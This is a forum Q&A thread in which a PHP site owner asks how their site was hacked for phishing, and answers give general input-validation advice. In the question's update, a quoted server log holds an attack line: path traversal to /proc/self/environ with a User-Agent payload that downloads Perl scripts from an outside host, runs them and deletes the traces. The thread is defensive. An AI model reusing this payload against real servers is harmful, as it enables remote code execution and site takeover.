# I have been attacked PHP/script injection - dummy question

Tags: php, phishing

My website has been attacked for phishing purposes. It is a complex website however I only use post and PHP files.

How could they attack me? I only use $_POST so I believe no SQL command and parameters are visible. **There is no framework just my little coding listing and accessing on the website.**

Any hint/suggestion would be appreciated.

Sorry if I don't reply straight but I am dealing with my provider who blocked the whole site.

this is their answer (any comment on it will be welcomed):

Because script injection attacks the site code itself, it is able to completely avoid webserver security. Unfortunately, some content management systems (especially older versions of Joomla) are extremely susceptible to this form of attack.

A simple way to remove the ability for attackers to use this method is to add a php.ini file at the top-level of the website with the following contents - be aware though that the web-site will need testing afterwards to ensure that no legitimate web-site scripted actions have been affected by the change:

---

The php.ini directives are...

allow_url_include = "0"

### allow_url_fopen = "0"

update:

here is what I got from the webhost company:

121.254.216.170 - - [12/Sep/2011:05:21:07 +0100] "GET /?p=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5806 "-" "http://some.thesome.com/etc/byz.jpg? -O /tmp/cmd548;cd /tmp;lwp-download http://some.thesome.com/etc/cup.txt;perl cup.txt;rm -rf *.txt*;wget
http://some.thesome.com/etc/update.txt;perl update.txt;rm -rf *.txt*'); echo \"#j13mb0t\"; ?>"

Comment: We need *way* more than that to give you anything at all.

Comment: Check your webserver log files.

Comment: thanks for the quick reply I am going to.

Comment: also thanks or David Nehme for the review.

Answer (score 2, accepted):

POST requests can be issued manually too, using cURL for example. There is no one preventing people from just opening a telnet terminal and issuing the command manually, and sending whatever parameters to your website.

Instead, you should always protect your website, and validate the input. Whether they come from POST, GET or any place else. Also, prefer to use PDO instead of the standard mysql functions in PHP.

Could you elaborate on what kind of `attack` happened on your website?

Comment: thanks for the answer I have updated the question as I have more info now. Any though on it?

Comment: Well, the .ini directives they posted arent related to SQL injection attacks, at all. Could you elaborate an what sort of an attack happened, and what did it affect?

Comment: HI and thanks I am going to update the question as I have a little bit of log

Answer (score 1):

There are a lot of ways a server can get hacked. It is hard to tell you how it happened in your case without knowing more about your project or server.

But some tips:

Make sure you always escape data that is written into your database. You can use mysql_real_escape_string() for example. Apart from an attack on your scripts, your server could have been attacked as well, for example trough FTP or SSH.

Apart from that, always make sure you update all popular frameworks/libraries you use.

Comment: thanks for the answer I have updated my question any idea on that?

Comment: I have no experience with those ini settings. It could either have to do with that or SQL injection. Check everywhere you handle _GET and _POST variables to see if they are secure.

Answer (score 0):

$_POST is not a valid method for blocking sql attacks. You have to use prepared statements with parameters for all values, that are received from $_GET or $_POST, or use mysql_real_escape_string for all those parameters.

Comment: thanks for the answer I have updated my question do you have any idea?